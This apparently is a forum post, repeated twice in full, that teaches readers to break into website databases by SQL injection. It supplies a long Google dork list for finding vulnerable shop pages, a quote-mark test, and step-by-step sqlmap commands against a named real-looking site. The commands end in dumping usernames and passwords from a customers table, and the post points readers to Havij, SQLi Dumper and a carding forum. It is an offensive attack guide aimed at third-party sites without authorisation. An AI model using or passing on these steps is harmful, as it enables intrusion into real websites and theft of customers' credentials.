xeocops
05-17-2018, 10:27 AM
Hello, Hacking lovers.
Today I am posting about how you can hack database of a website by using a technique called SQL injection.
Now, Before I start I want to let you know about some basic things used in SQL injection.
1. What is SQL?
Ans: SQL or Structured query language is a standard language for storing, accessing and manipulating databases.
2. What is the database?
Ans: Database is the backend of any website where a structured set of data is stored on a computer/server so that it can be easily accessed, managed in various ways.
3. What is a web vulnerability?
Ans: Vulnerability is a state of being exposed to the possibility of an attack.
4. What is Injection in SQL?
Ans: Injection in SQL is a code injection technique Used to insert codes for execution in order to attack data-driven applications.
5. What are dorks?
Ans: a dork is a specific search query for an exploitable website. for example: products.php?id= , shop.asp?shopid= etc etc etc.
6. What is a search engine?
Ans: Google, Yahoo, Bing.
Now, I want to move to the main part of how can we attack the database?
Mainly what happens when a designer designed a website is they mostly they use HTML and CSS for designing, PHP for scripting and MySQL for a database. this is common in almost 90% of websites today. sometimes there are loopholes in the coding which let attacker attacks and dump/copy the database, change the database etc.
if you have right tools, It's not difficult to attack a website.
Here is the list of requirements you need before an attack.
1. Dorks
2. SQLMAP, SQli dumper or Havij Pro etc.
3. little brains
So lets begin. (I AM DEMONSTRATING NOT THE MANUAL METHOD SO REMEMBER YOU WILL NEED TOOLS)
1ST METHOD:::: SQLMAP
---> Get a dork you wish to use here's the list of private dorks you can use...
inurl: item.asp?prodtype=
inurl: item.asp?shopcd=
inurl: item.asp?sub_id=
inurl: item.cfm?eid=
inurl: item.cfm?item_id=
inurl: item.cfm?itemid=
inurl: item.cfm?model=
item.cfm?prodtype=
item.cfm?shopcd=
item.php?SKU=
item.php?cat=
item.php?code=
item.php?eid=
item.php?id=
item.php?iid=
item.php?item=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item.php?sub_id=
item/detail.php?num=
item/wpa-storefront-the-ultimate-wpecommerce-theme/discussion/61891?page=
itemDesc.asp?CartId=
itemDesc.cfm?CartId=
itemDesc.php?CartId=
item_book.asp?CAT=
item_book.php?CAT=
item_details.asp?catid=
item_details.cfm?catid=
item_details.php?catid=
item_id=
item_list.asp?cat_id=
item_list.asp?maingroup
item_list.cfm?maingroup
item_list.php?cat_id=
item_list.php?maingroup
item_show.asp?code_no=
item_show.asp?id=
item_show.asp?lid=
item_show.cfm?code_no=
item_show.php?code_no=
item_show.php?id=
item_show.php?itemID=
item_show.php?lid=
itemdetail.asp?item=
itemdetail.cfm?item=
itemdetail.php?item=
itemdetails.asp?catalogid=
itemdetails.cfm?catalogid=
itemdetails.php?catalogid=
itemlist.php?categoryID=
kr/product/product.php?gubun=
kshop/home.php?cat=
kshop/product.asp?productid=
kshop/product.php?productid=
order-now.php?prodid=
order.asp?BookID=
order.asp?id=
order.asp?item_ID=
order.asp?lotid=
order.cfm?BookID=
order.cfm?id=
order.cfm?item_ID=
order.php?BookID=
order.php?id=
order.php?item_ID=
order.php?l= order.php?l=
order.php?lang= order.php?lang=
order.php?list= order.php?list=
order.php?ln= order.php?ln=
order.php?p= order.php?p=
order.php?pag= order.php?pag=
order.php?page= order.php?page=
order.php?pg= order.php?pg=
order.php?wp= .php?wp=
order.php?wp= order.php?wp=
order/cart/index.php?maincat_id=
prod.asp?cat=
prod.php?cat=
prod.php?prod= .php?prod="
prodView.asp?idProduct=
prodView.cfm?idProduct=
prodView.php?idProduct=
prod_detail.php?id=
prod_details.php?id=
prod_details.php?products_id=
prod_indiv.php?groupid=
prod_info.php?id=
prod_show.asp?id=
prod_show.asp?prodid=
prodbycat.asp?intCatalogID=
prodbycat.cfm?intCatalogID=
prodbycat.php?intCatalogID=
proddetail.php?prod=
proddetail.php?prod= .php?prod="
proddetails_print.php?prodid=
prodetails.asp?prodid=
prodetails.cfm?prodid=
prodetails.php?prodid=
prodlist.asp?catid=
prodlist.cfm?catid=
prodlist.php?catid=
prodotti.asp?id_cat=
prodotti.php?id_cat=
prodrev.php?cat=
product-detail.php?prodid=
product-details.php?prodID=
product-info.php?cat=
product-item.php?id=
product-list.asp?category_id=
product-list.asp?cid=
product-list.asp?id=
product-list.php?category_id=
product-list.php?cid=
product-list.php?id=
product-range.asp?rangeID=
product-range.php?rangeID=
product.asp?****=
product.asp?ItemID=
product.asp?bid=
product.asp?bookID=
product.asp?cat=
product.asp?id=
product.asp?id_h=
product.asp?intProdID=
product.asp?intProductID=
product.asp?pid=
product.asp?prd=
product.asp?prodid=
product.asp?product=
product.asp?product_id=
product.asp?productid=
product.asp?shopprodid=
product.asp?sku=
product.cfm?bookID=
product.cfm?intProdID=
product.php?****=
product.php?ItemId=
product.php?bid=
product.php?bookID=
product.php?brand=
product.php?c=
product.php?cat=
product.php?cat_id=
product.php?fdProductId=
product.php?id=
product.php?id_h=
product.php?inid=
product.php?intProdID=
product.php?intProductID=
product.php?lang=
product.php?par=
product.php?pcid=
product.php?pid=
product.php?pl=
product.php?prd=
product.php?prod_num=
product.php?prodid=
product.php?product=
product.php?product_id=
----> pick up any dork and search it on google, you'll get a list of websites from google search. Now, open any result you want. you'll get the site address like this one
http://www.recklesserica.com/product.php?itemID=1004 itemID is parameter here and 1004 is value, remember you only have to use urls with parameters. so now you have the URL with parameter, you have to put a single inverted comma at the end of URL like for e.g ----> http://www.recklesserica.com/product.php?itemID=1004' and hit enter. if you get any error in after hitting enter on the page like "Items Query Failed: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1" then this link is vulnerable to SQL injection or SQLi.
----> now you got the vulnerable link it's time to open SQLMAP, for those who don't know what sqlmap is please figure it out. The operating system is not a problem you can run SQLMAP in Windows too.
(in windows download sqlmap and on the folder hold "shift" and right click and click on "open command window here" Remember you have to install python before using sqlmap)
---> Now the command will look like this
>>> sqlmap -u [URL] --random-agent --tamper="between,space2comment" <<<< In windows use sqlmap.py and the rest are same.
-u = URL
--random-agent is random agent
and tamper is scripts... there are other tamper scripts but these two will work perfectly don't worry about that.
So, the actual URL will look like this..
sqlmap -u http://www.recklesserica.com/product.php?itemID=1004 --random-agent --tamper="between,space2comment" (LINUX) & sqlmap.py -u http://www.recklesserica.com/product.php?itemID=1004 --random-agent --tamper="between,space2comment" (WINDOWS) remember this .py and not py i'll go with Linux so will not tell you again.
---> Now hit "enter" and you'll see command is processing. Read messages during the testing. sqlmap will ask you for yes and no during testing you have to read it and give input (That's why i said you need little brains)
---> Now at this testing you'll probably see the message that target is vulnerable to sqli and testing finishes with it asking you wish to further testing? simply type N and enter.
----> Once this testing finishes and you'll get the message that target is vulnerable you have to run another command. similar to first one.
>>>> sqlmap -u http://www.recklesserica.com/product.php?itemID=1004 --dbs <<<< This will give you list of databases
for e.g
INFORMATION SCHEMA
DB775544
----> Now you can run this command to navigate in the database.
---> For showing tables >>>> sqlmap -u http://www.recklesserica.com/product.php?itemID=1004 -D DB775544 --tables <<<<
output: list of tables for e.g admin, customers, orders etc etc..
----> for showing columns in table >>>>> sqlmap -u http://www.recklesserica.com/product.php?itemID=1004 -D DB775544 -T customers --columns <<<<<
output: list of columns for e.g username, password etc etc...
----> Now you can copy or dump the data using this command
>>>>> sqlmap -u http://www.recklesserica.com/product.php?itemID=1004 -D DB775544 -T customers -C username,password --dump <<<<<
and it'll copy the columns with username and password.
2ND METHOD Using HAVIJ PRO AND SQLI DUMPER
havij and sqli dumper is GUI for sqli...
--> In havij you have to provide the vulnerable link (I already described how to) and start the attack. Just follow the GUI interface to hack database. It's simple I'll not describe it in detail. little different for Sqli dumper where you have to provide a list of dorks and start the analyzer and it'll analyze and give you results you don't have to get links from googling it'll automatically make it.
These two tools are simple I don't want to describe here. For these tools, you can look further in this forum Cardmafia.cc
I really hope you enjoy the tutorial, Good luck hacking. ;)
Today I am posting about how you can hack database of a website by using a technique called SQL injection.
Now, Before I start I want to let you know about some basic things used in SQL injection.
1. What is SQL?
Ans: SQL or Structured query language is a standard language for storing, accessing and manipulating databases.
2. What is the database?
Ans: Database is the backend of any website where a structured set of data is stored on a computer/server so that it can be easily accessed, managed in various ways.
3. What is a web vulnerability?
Ans: Vulnerability is a state of being exposed to the possibility of an attack.
4. What is Injection in SQL?
Ans: Injection in SQL is a code injection technique Used to insert codes for execution in order to attack data-driven applications.
5. What are dorks?
Ans: a dork is a specific search query for an exploitable website. for example: products.php?id= , shop.asp?shopid= etc etc etc.
6. What is a search engine?
Ans: Google, Yahoo, Bing.
Now, I want to move to the main part of how can we attack the database?
Mainly what happens when a designer designed a website is they mostly they use HTML and CSS for designing, PHP for scripting and MySQL for a database. this is common in almost 90% of websites today. sometimes there are loopholes in the coding which let attacker attacks and dump/copy the database, change the database etc.
if you have right tools, It's not difficult to attack a website.
Here is the list of requirements you need before an attack.
1. Dorks
2. SQLMAP, SQli dumper or Havij Pro etc.
3. little brains
So lets begin. (I AM DEMONSTRATING NOT THE MANUAL METHOD SO REMEMBER YOU WILL NEED TOOLS)
1ST METHOD:::: SQLMAP
---> Get a dork you wish to use here's the list of private dorks you can use...
inurl: item.asp?prodtype=
inurl: item.asp?shopcd=
inurl: item.asp?sub_id=
inurl: item.cfm?eid=
inurl: item.cfm?item_id=
inurl: item.cfm?itemid=
inurl: item.cfm?model=
item.cfm?prodtype=
item.cfm?shopcd=
item.php?SKU=
item.php?cat=
item.php?code=
item.php?eid=
item.php?id=
item.php?iid=
item.php?item=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item.php?sub_id=
item/detail.php?num=
item/wpa-storefront-the-ultimate-wpecommerce-theme/discussion/61891?page=
itemDesc.asp?CartId=
itemDesc.cfm?CartId=
itemDesc.php?CartId=
item_book.asp?CAT=
item_book.php?CAT=
item_details.asp?catid=
item_details.cfm?catid=
item_details.php?catid=
item_id=
item_list.asp?cat_id=
item_list.asp?maingroup
item_list.cfm?maingroup
item_list.php?cat_id=
item_list.php?maingroup
item_show.asp?code_no=
item_show.asp?id=
item_show.asp?lid=
item_show.cfm?code_no=
item_show.php?code_no=
item_show.php?id=
item_show.php?itemID=
item_show.php?lid=
itemdetail.asp?item=
itemdetail.cfm?item=
itemdetail.php?item=
itemdetails.asp?catalogid=
itemdetails.cfm?catalogid=
itemdetails.php?catalogid=
itemlist.php?categoryID=
kr/product/product.php?gubun=
kshop/home.php?cat=
kshop/product.asp?productid=
kshop/product.php?productid=
order-now.php?prodid=
order.asp?BookID=
order.asp?id=
order.asp?item_ID=
order.asp?lotid=
order.cfm?BookID=
order.cfm?id=
order.cfm?item_ID=
order.php?BookID=
order.php?id=
order.php?item_ID=
order.php?l= order.php?l=
order.php?lang= order.php?lang=
order.php?list= order.php?list=
order.php?ln= order.php?ln=
order.php?p= order.php?p=
order.php?pag= order.php?pag=
order.php?page= order.php?page=
order.php?pg= order.php?pg=
order.php?wp= .php?wp=
order.php?wp= order.php?wp=
order/cart/index.php?maincat_id=
prod.asp?cat=
prod.php?cat=
prod.php?prod= .php?prod="
prodView.asp?idProduct=
prodView.cfm?idProduct=
prodView.php?idProduct=
prod_detail.php?id=
prod_details.php?id=
prod_details.php?products_id=
prod_indiv.php?groupid=
prod_info.php?id=
prod_show.asp?id=
prod_show.asp?prodid=
prodbycat.asp?intCatalogID=
prodbycat.cfm?intCatalogID=
prodbycat.php?intCatalogID=
proddetail.php?prod=
proddetail.php?prod= .php?prod="
proddetails_print.php?prodid=
prodetails.asp?prodid=
prodetails.cfm?prodid=
prodetails.php?prodid=
prodlist.asp?catid=
prodlist.cfm?catid=
prodlist.php?catid=
prodotti.asp?id_cat=
prodotti.php?id_cat=
prodrev.php?cat=
product-detail.php?prodid=
product-details.php?prodID=
product-info.php?cat=
product-item.php?id=
product-list.asp?category_id=
product-list.asp?cid=
product-list.asp?id=
product-list.php?category_id=
product-list.php?cid=
product-list.php?id=
product-range.asp?rangeID=
product-range.php?rangeID=
product.asp?****=
product.asp?ItemID=
product.asp?bid=
product.asp?bookID=
product.asp?cat=
product.asp?id=
product.asp?id_h=
product.asp?intProdID=
product.asp?intProductID=
product.asp?pid=
product.asp?prd=
product.asp?prodid=
product.asp?product=
product.asp?product_id=
product.asp?productid=
product.asp?shopprodid=
product.asp?sku=
product.cfm?bookID=
product.cfm?intProdID=
product.php?****=
product.php?ItemId=
product.php?bid=
product.php?bookID=
product.php?brand=
product.php?c=
product.php?cat=
product.php?cat_id=
product.php?fdProductId=
product.php?id=
product.php?id_h=
product.php?inid=
product.php?intProdID=
product.php?intProductID=
product.php?lang=
product.php?par=
product.php?pcid=
product.php?pid=
product.php?pl=
product.php?prd=
product.php?prod_num=
product.php?prodid=
product.php?product=
product.php?product_id=
----> pick up any dork and search it on google, you'll get a list of websites from google search. Now, open any result you want. you'll get the site address like this one
http://www.recklesserica.com/product.php?itemID=1004 itemID is parameter here and 1004 is value, remember you only have to use urls with parameters. so now you have the URL with parameter, you have to put a single inverted comma at the end of URL like for e.g ----> http://www.recklesserica.com/product.php?itemID=1004' and hit enter. if you get any error in after hitting enter on the page like "Items Query Failed: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1" then this link is vulnerable to SQL injection or SQLi.
----> now you got the vulnerable link it's time to open SQLMAP, for those who don't know what sqlmap is please figure it out. The operating system is not a problem you can run SQLMAP in Windows too.
(in windows download sqlmap and on the folder hold "shift" and right click and click on "open command window here" Remember you have to install python before using sqlmap)
---> Now the command will look like this
>>> sqlmap -u [URL] --random-agent --tamper="between,space2comment" <<<< In windows use sqlmap.py and the rest are same.
-u = URL
--random-agent is random agent
and tamper is scripts... there are other tamper scripts but these two will work perfectly don't worry about that.
So, the actual URL will look like this..
sqlmap -u http://www.recklesserica.com/product.php?itemID=1004 --random-agent --tamper="between,space2comment" (LINUX) & sqlmap.py -u http://www.recklesserica.com/product.php?itemID=1004 --random-agent --tamper="between,space2comment" (WINDOWS) remember this .py and not py i'll go with Linux so will not tell you again.
---> Now hit "enter" and you'll see command is processing. Read messages during the testing. sqlmap will ask you for yes and no during testing you have to read it and give input (That's why i said you need little brains)
---> Now at this testing you'll probably see the message that target is vulnerable to sqli and testing finishes with it asking you wish to further testing? simply type N and enter.
----> Once this testing finishes and you'll get the message that target is vulnerable you have to run another command. similar to first one.
>>>> sqlmap -u http://www.recklesserica.com/product.php?itemID=1004 --dbs <<<< This will give you list of databases
for e.g
INFORMATION SCHEMA
DB775544
----> Now you can run this command to navigate in the database.
---> For showing tables >>>> sqlmap -u http://www.recklesserica.com/product.php?itemID=1004 -D DB775544 --tables <<<<
output: list of tables for e.g admin, customers, orders etc etc..
----> for showing columns in table >>>>> sqlmap -u http://www.recklesserica.com/product.php?itemID=1004 -D DB775544 -T customers --columns <<<<<
output: list of columns for e.g username, password etc etc...
----> Now you can copy or dump the data using this command
>>>>> sqlmap -u http://www.recklesserica.com/product.php?itemID=1004 -D DB775544 -T customers -C username,password --dump <<<<<
and it'll copy the columns with username and password.
2ND METHOD Using HAVIJ PRO AND SQLI DUMPER
havij and sqli dumper is GUI for sqli...
--> In havij you have to provide the vulnerable link (I already described how to) and start the attack. Just follow the GUI interface to hack database. It's simple I'll not describe it in detail. little different for Sqli dumper where you have to provide a list of dorks and start the analyzer and it'll analyze and give you results you don't have to get links from googling it'll automatically make it.
These two tools are simple I don't want to describe here. For these tools, you can look further in this forum Cardmafia.cc
I really hope you enjoy the tutorial, Good luck hacking. ;)